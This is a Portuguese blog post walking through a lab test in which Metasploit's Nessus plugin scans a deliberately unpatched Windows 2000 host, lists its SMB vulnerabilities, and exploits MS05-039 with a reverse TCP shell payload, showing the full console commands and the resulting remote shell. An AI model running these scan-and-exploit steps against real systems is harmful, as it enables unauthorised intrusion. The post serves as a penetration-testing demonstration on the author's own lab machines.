<p>Recentemente o desenvolvedor <a href="http://blog.zate.org/2010/09/26/nessus-bridge-for-metasploit-intro/">Zate Berg</a> disponibilizou um plug-in do <a href="http://nessus.org/nessus/">Nessus</a> para o <a href="http://www.metasploit.com/">Metasploit Framework</a> ele está disponivel na versão em <a href="http://www.metasploit.com/framework/download/">desenvolvimento</a> do MSF.</p> <p>Para os testes utilizei o seguinte cenário:</p> <p>* Host Debian com Nessus e Metasploit<br /> * Host Alvo com Windows 2000 &#8220;bugado até a alma&#8221;</p> <p>Inicialmente atualizei o MSF e o Nessus e depois parti para a diversão</p> <blockquote><p> <strong>cd /tmp/pentest_tools/trunk</strong></p> <p><strong>svn update</strong> </p></blockquote> <blockquote><p> <strong>/opt/nessus/sbin/nessus-update-plugins</strong></p> <p><strong>/opt/nessus/sbin/nessus-service &#038;</strong></p> <p><strong>./msconsole</strong></p> <p>&#124; &#124; &#124; &#124; (_) &#124;<br /> _ __ ___ ___&#124; &#124;_ __ _ ___ _ __ &#124; &#124; ___ _&#124; &#124;_<br /> &#124; &#8216;_ ` _ \ / _ \ __/ _` / __&#124; &#8216;_ \&#124; &#124;/ _ \&#124; &#124; __&#124;<br /> &#124; &#124; &#124; &#124; &#124; &#124; __/ &#124;&#124; (_&#124; \__ \ &#124;_) &#124; &#124; (_) &#124; &#124; &#124;_<br /> &#124;_&#124; &#124;_&#124; &#124;_&#124;\___&#124;\__\__,_&#124;___/ .__/&#124;_&#124;\___/&#124;_&#124;\__&#124;<br /> &#124; &#124;<br /> &#124;_&#124;</p> <p>=[ metasploit v3.4.2-dev [core:3.4 api:1.0]<br /> + &#8212; &#8211;=[ 592 exploits - 302 auxiliary<br /> + -- --=[ 225 payloads - 27 encoders - 8 nops<br /> =[ svn r10505 updated today (2010.09.28)</p> <p>msf> </p></blockquote> <p><strong>Diversão</strong> <img class="wp-smiley" src="http://blog.alexos.com.br/wp-includes/images/smilies/icon_smile.gif" alt=":)" /> </p> <p>Carregando o Nessus plug-in</p> <blockquote><p> <strong>msf> load nessus</strong></p> <p>[*] Nessus Bridge for Nessus 4.2.x<br /> [+] Type nessus_help for a command listing<br /> [*] Successfully loaded plugin: nessus </p></blockquote> <p>Conectando&#8230;</p> <blockquote><p> <strong>msf> nessus_connect localhost:8834 ok</strong></p> <p>[+] Username:<br /> alexos<br /> [+] Password:<br /> ***********<br /> [*] Connecting to https://localhost:8834/ as alexos<br /> [*] Authenticated </p></blockquote> <p>Listando as políticas existentes no Nessus</p> <blockquote><p> <strong>msf> nessus_policy_list</strong></p> <p>[+] Nessus Policy List</p> <p>ID Name Owner visability<br /> &#8211; &#8212;- &#8212;&#8211; &#8212;&#8212;&#8212;-<br /> 1 attack alexos private </p></blockquote> <p>Iniciando a varredura</p> <blockquote><p> <strong>msf> nessus_scan_new 1 alexoscorelabs 192.168.0.6</strong></p> <p>[*] Creating scan from policy number 1, called &#8220;alexoscorelabs&#8221; and scanning 192.168.0.6<br /> [*] Scan started. uid is af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8b0 </p></blockquote> <p>Finalizada a verredura é hora de checar o relatório</p> <blockquote><p> <strong>msf> nessus_report_hosts_ports 192.168.0.6 af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8</strong></p> <p>[+] Host Info</p> <p>Port Protocol Severity Service Name Sev 0 Sev 1 Sev 2 Sev 3<br /> &#8212;- &#8212;&#8212;&#8211; &#8212;&#8212;&#8211; &#8212;&#8212;&#8212;&#8212; &#8212;&#8211; &#8212;&#8211; &#8212;&#8211; &#8212;&#8211;<br /> 0 icmp 1 general 0 2 0 0<br /> 0 tcp 3 general 0 9 0 1<br /> 0 udp 1 general 0 1 0 0<br /> 21 tcp 3 ftp 1 4 2 2<br /> 135 tcp 3 epmap 1 1 0 1<br /> 135 udp 3 epmap? 0 0 0 1<br /> 137 udp 1 netbios-ns 0 1 0 0<br /> 139 tcp 1 smb 1 1 0 0<br /> 445 tcp 3 cifs 1 10 2 12<br /> 1025 tcp 3 dce-rpc 1 1 0 1<br /> 1028 udp 1 dce-rpc 0 1 0 0<br /> 5800 tcp 1 www 1 4 0 0<br /> 5801 tcp 1 www 1 3 0 0<br /> 5900 tcp 3 vnc 1 2 0 1<br /> 5901 tcp 1 vnc 1 3 0 0 </p></blockquote> <p>Obtendo informações sobre as vulnerabilidades existentes na porta 445 ( smb ) do alvo</p> <blockquote><p> <strong>msf> nessus_report_host_detail 192.168.0.6 445 tcp af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8b0</strong></p> <p>[+] Port Info</p> <p>Port Severity PluginID Plugin Name CVSS2 Exploit? CVE Risk Factor CVSS Vector<br /> &#8212;- &#8212;&#8212;&#8211; &#8212;&#8212;&#8211; &#8212;&#8212;&#8212;&#8211; &#8212;&#8211; &#8212;&#8212;&#8211; &#8212; &#8212;&#8212;&#8212;&#8211; &#8212;&#8212;&#8212;&#8211;<br /> cifs (445/tcp) 1 10736 DCE Services Enumeration none . . None .<br /> cifs (445/tcp) 1 10785 SMB NativeLanManager Remote System Information Disclosure none . . None .<br /> cifs (445/tcp) 1 10394 SMB Log In Possible none false CVE-1999-0504 None .<br /> cifs (445/tcp) 1 11011 SMB Service Detection none . . None .<br /> cifs (445/tcp) 1 10395 SMB Shares Enumeration none . . None .<br /> cifs (445/tcp) 1 26920 Windows SMB NULL Session Authentication none false CVE-1999-0519 None .<br /> cifs (445/tcp) 1 17651 Obtains the password policy none . . None .<br /> cifs (445/tcp) 3 22034 MS06-035: Vulnerability in Server Service Could Allow Remote Code Execution (917159) (uncredentialed check) 7.5 true CVE-2006-1314 High CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P<br /> cifs (445/tcp) 3 19407 MS05-043: Vulnerability in Printer Spooler Service Could Allow Remote Code Execution (896423) (uncredentialed check) 10.0 true CVE-2005-1984 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C<br /> cifs (445/tcp) 3 12209 MS04-011: Security Update for Microsoft Windows (835732) (uncredentialed check) 10.0 true CVE-2003-0533 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C<br /> cifs (445/tcp) 3 12054 MS04-007: ASN.1 Vulnerability Could Allow Code Execution (828028) (uncredentialed check) 10.0 true CVE-2003-0818 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C<br /> cifs (445/tcp) 1 10859 SMB LsaQueryInformationPolicy Function SID Enumeration none true CVE-2000-1200 None .<br /> cifs (445/tcp) 3 22194 MS06-040: Vulnerability in Server Service Could Allow Remote Code Execution (921883) (uncredentialed check) 10.0 true CVE-2006-3439 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C<br /> <strong><br /> cifs (445/tcp) 3 19408 MS05-039: Vulnerability in Plug and Play Service Could Allow Remote Code Execution (899588) (uncredentialed check) 10.0 true CVE-2005-1983 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C<br /> </strong><br /> cifs (445/tcp) 3 21193 MS05-047: Plug and Play Remote Code Execution and Local Privilege Elevation (905749) (uncredentialed check) 10.0 false CVE-2005-2120 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C<br /> cifs (445/tcp) 2 18602 SMB svcctl MSRPC Interface SCM Service Enumeration 5.0 false CVE-2005-2150 Medium CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N<br /> cifs (445/tcp) 2 18585 SMB Service Enumeration via \srvsvc 5.0 false CVE-2005-2150 Medium CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N<br /> cifs (445/tcp) 3 35362 MS09-001: Microsoft Windows SMB Vulnerabilities Remote Code Execution (958687) (uncredentialed check) 10.0 . CVE-2008-4834 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C<br /> cifs (445/tcp) 1 26917 SMB Registry : Nessus Cannot Access the Windows Registry none . . None .<br /> cifs (445/tcp) 3 18502 MS05-027: Vulnerability in SMB Could Allow Remote Code Execution (896422) (uncredentialed check) 10.0 false CVE-2005-1206 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C<br /> cifs (445/tcp) 3 11835 MS03-039: Microsoft RPC Interface Buffer Overrun (824146) (uncredentialed check) 10.0 true CVE-2003-0715 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C<br /> cifs (445/tcp) 1 10860 SMB Use Host SID to Enumerate Local Users none true CVE-2000-1200 None .<br /> cifs (445/tcp) 3 11808 MS03-026: Microsoft RPC Interface Buffer Overrun (823980) 10.0 true CVE-2003-0352 Critical CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C<br /> cifs (445/tcp) 3 11110 MS02-045: Microsoft Windows SMB Protocol SMB_COM_TRANSACTION Packet Remote Overflow DoS (326830) 7.5 true CVE-2002-0724 High CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P </p></blockquote> <p>Usando o MSF explorei a vulnerabilidade MS05-039: Vulnerability in Plug and Play Service Could Allow Remote Code Execution</p> <blockquote><p> <strong>msf> use exploit/windows/smb/ms05_039_pnp</strong></p> <p><strong>msf exploit(ms05_039_pnp)> set RHOST 192.168.0.6</strong></p> <p><strong>msf exploit(ms05_039_pnp)> set PAYLOAD windows/shell/reverse_tcp</strong></p> <p><strong>msf exploit(ms05_039_pnp)> set LHOST 192.168.0.3</strong></p> <p><strong>msf exploit(ms05_039_pnp)> exploit</strong></p> <p>[*] Started reverse handler on 192.168.0.3:4444<br /> [*] Connecting to the SMB service&#8230;<br /> [*] Binding to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:192.168.0.6[\browser] &#8230;<br /> [*] Bound to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:192.168.0.6[\browser] &#8230;<br /> [*] Calling the vulnerable function&#8230;<br /> [*] Sending stage (240 bytes) to 192.168.0.6<br /> [*] Command shell session 1 opened (192.168.0.3:4444 -> 192.168.0.6:1184) at Tue Sep 28 17:24:01 -0300 2010<br /> [*] Server did not respond, this is expected<br /> [*] The server should have executed our payload</p> <p><strong><br /> Microsoft Windows 2000 [Version 5.00.2195]<br /> (C) Copyright 1985-1999 Microsoft Corp.<br /> </strong></p> <p>C:\WINNT\system32> </p></blockquote> <blockquote><p> C:\WINNT\system32> ipconfig<br /> ipconfig</p> <p>Windows 2000 IP Configuration</p> <p>Ethernet adapter Local Area Connection:</p> <p>Connection-specific DNS Suffix . :<br /> IP Address. . . . . . . . . . . . : 192.168.0.6<br /> Subnet Mask . . . . . . . . . . . : 255.255.255.0<br /> Default Gateway . . . . . . . . . : 192.168.0.2 </p></blockquote> <p>Estes MSF add-ons serão sempre bem-vindos, outra integração interessante é a do Metasploit com o <a href="http://ettercap.sourceforge.net/">Ethercap</a> para testes de <a href="http://en.wikipedia.org/wiki/Man-in-the-middle_attack">MITM</a>.</p> <div><h3>See:</h3><ul><li><a href="http://blog.alexos.com.br/?p=102&amp;#38;lang=pt-br" class="crp_title">Usando Nessus</a></li><li><a href="http://blog.alexos.com.br/?p=297&amp;#38;lang=pt-br" class="crp_title">Usando o Nikto webserver scanner</a></li><li><a href="http://blog.alexos.com.br/?p=18&amp;#38;lang=pt-br" class="crp_title">Mozilla Firefox iframe.contentWindow.focus Deleted Object Reference Vulnerability</a></li><li><a href="http://blog.alexos.com.br/?p=17&amp;#38;lang=pt-br" class="crp_title">Mozilla Suite, Firefox, SeaMonkey, and Thunderbird Multiple Remote Vulnerabilities</a></li><li><a href="http://blog.alexos.com.br/?p=1954&amp;#38;lang=pt-br" class="crp_title">DLL Hijacking também afeta algumas Linux distros</a></li></ul></div><p><a href="http://www.addtoany.com/add_to/google_bookmarks?linkurl=http%3A%2F%2Fblog.alexos.com.br%2F%3Fp%3D1996%26amp%3Blang%3Dpt-br&amp;linkname=Brincando%20com%20o%20plugin%20do%20Nessus%20para%20o%20Metasploit" title="Google Bookmarks" class="a2a_button_google_bookmarks" target="_blank"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/icons/google.png" height="16" alt="Google Bookmarks" width="16" /></a> <a href="http://www.addtoany.com/add_to/twitter?linkurl=http%3A%2F%2Fblog.alexos.com.br%2F%3Fp%3D1996%26amp%3Blang%3Dpt-br&amp;linkname=Brincando%20com%20o%20plugin%20do%20Nessus%20para%20o%20Metasploit" title="Twitter" class="a2a_button_twitter" target="_blank"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/icons/twitter.png" height="16" alt="Twitter" width="16" /></a> <a href="http://www.addtoany.com/add_to/technorati_favorites?linkurl=http%3A%2F%2Fblog.alexos.com.br%2F%3Fp%3D1996%26amp%3Blang%3Dpt-br&amp;linkname=Brincando%20com%20o%20plugin%20do%20Nessus%20para%20o%20Metasploit" title="Technorati Favorites" class="a2a_button_technorati_favorites" target="_blank"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/icons/technorati.png" height="16" alt="Technorati Favorites" width="16" /></a> <a href="http://www.addtoany.com/add_to/google_gmail?linkurl=http%3A%2F%2Fblog.alexos.com.br%2F%3Fp%3D1996%26amp%3Blang%3Dpt-br&amp;linkname=Brincando%20com%20o%20plugin%20do%20Nessus%20para%20o%20Metasploit" title="Google Gmail" class="a2a_button_google_gmail" target="_blank"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/icons/gmail.png" height="16" alt="Google Gmail" width="16" /></a> <a href="http://www.addtoany.com/add_to/linkedin?linkurl=http%3A%2F%2Fblog.alexos.com.br%2F%3Fp%3D1996%26amp%3Blang%3Dpt-br&amp;linkname=Brincando%20com%20o%20plugin%20do%20Nessus%20para%20o%20Metasploit" title="LinkedIn" class="a2a_button_linkedin" target="_blank"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/icons/linkedin.png" height="16" alt="LinkedIn" width="16" /></a> <a href="http://www.addtoany.com/add_to/google_reader?linkurl=http%3A%2F%2Fblog.alexos.com.br%2F%3Fp%3D1996%26amp%3Blang%3Dpt-br&amp;linkname=Brincando%20com%20o%20plugin%20do%20Nessus%20para%20o%20Metasploit" title="Google Reader" class="a2a_button_google_reader" target="_blank"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/icons/reader.png" height="16" alt="Google Reader" width="16" /></a> <a href="http://www.addtoany.com/add_to/wordpress?linkurl=http%3A%2F%2Fblog.alexos.com.br%2F%3Fp%3D1996%26amp%3Blang%3Dpt-br&amp;linkname=Brincando%20com%20o%20plugin%20do%20Nessus%20para%20o%20Metasploit" title="WordPress" class="a2a_button_wordpress" target="_blank"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/icons/wordpress.png" height="16" alt="WordPress" width="16" /></a> <a href="http://www.addtoany.com/add_to/slashdot?linkurl=http%3A%2F%2Fblog.alexos.com.br%2F%3Fp%3D1996%26amp%3Blang%3Dpt-br&amp;linkname=Brincando%20com%20o%20plugin%20do%20Nessus%20para%20o%20Metasploit" title="Slashdot" class="a2a_button_slashdot" target="_blank"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/icons/slashdot.png" height="16" alt="Slashdot" width="16" /></a> <a href="http://www.addtoany.com/add_to/reddit?linkurl=http%3A%2F%2Fblog.alexos.com.br%2F%3Fp%3D1996%26amp%3Blang%3Dpt-br&amp;linkname=Brincando%20com%20o%20plugin%20do%20Nessus%20para%20o%20Metasploit" title="Reddit" class="a2a_button_reddit" target="_blank"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/icons/reddit.png" height="16" alt="Reddit" width="16" /></a> <a href="http://www.addtoany.com/add_to/delicious?linkurl=http%3A%2F%2Fblog.alexos.com.br%2F%3Fp%3D1996%26amp%3Blang%3Dpt-br&amp;linkname=Brincando%20com%20o%20plugin%20do%20Nessus%20para%20o%20Metasploit" title="Delicious" class="a2a_button_delicious" target="_blank"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/icons/delicious.png" height="16" alt="Delicious" width="16" /></a> <a href="http://www.addtoany.com/add_to/multiply?linkurl=http%3A%2F%2Fblog.alexos.com.br%2F%3Fp%3D1996%26amp%3Blang%3Dpt-br&amp;linkname=Brincando%20com%20o%20plugin%20do%20Nessus%20para%20o%20Metasploit" title="Multiply" class="a2a_button_multiply" target="_blank"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/icons/multiply.png" height="16" alt="Multiply" width="16" /></a> <a href="http://www.addtoany.com/add_to/digg?linkurl=http%3A%2F%2Fblog.alexos.com.br%2F%3Fp%3D1996%26amp%3Blang%3Dpt-br&amp;linkname=Brincando%20com%20o%20plugin%20do%20Nessus%20para%20o%20Metasploit" title="Digg" class="a2a_button_digg" target="_blank"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/icons/digg.png" height="16" alt="Digg" width="16" /></a> <a href="http://www.addtoany.com/add_to/identi_ca?linkurl=http%3A%2F%2Fblog.alexos.com.br%2F%3Fp%3D1996%26amp%3Blang%3Dpt-br&amp;linkname=Brincando%20com%20o%20plugin%20do%20Nessus%20para%20o%20Metasploit" title="Identi.ca" class="a2a_button_identi_ca" target="_blank"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/icons/identica.png" height="16" alt="Identi.ca" width="16" /></a> <a href="http://www.addtoany.com/share_save" class="a2a_dd addtoany_share_save"><img src="http://blog.alexos.com.br/wp-content/plugins/add-to-any/share_save_171_16.png" height="16" alt="Share" width="171" /></a> </p>